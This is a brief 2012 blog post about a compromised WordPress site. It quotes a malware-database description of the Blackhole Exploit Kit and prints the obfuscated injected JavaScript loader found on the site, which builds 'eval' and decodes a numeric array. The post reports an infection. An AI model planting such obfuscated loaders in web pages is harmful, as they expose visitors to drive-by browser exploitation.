Tuesday, July 17, 2012

wordpress site hacked

With so many updated to wordpress i would have thought the platform was safer from being hacked.

you can scan you website for malware with

https://www.virustotal.com/#url (DO NOT DETECT MALWARE)

I got a site with some weird js code on the home page

Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole2

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Jun).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.

Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

< script >try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="81.90.945.1020.288.400.900.1110.891.1170.981.1010.990.1160.414.1030.909.1160.621.1080.909.1090.909.1100.1044.1150.594.1210.756.970.927.780.873.1090.909.400.351.980.999.1000.1089.390.369.910.432.930.369.1230.".split(".");h=2;s="";if(window["document"])for(i=0;-583+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);}< /script >

No comments:

Post a Comment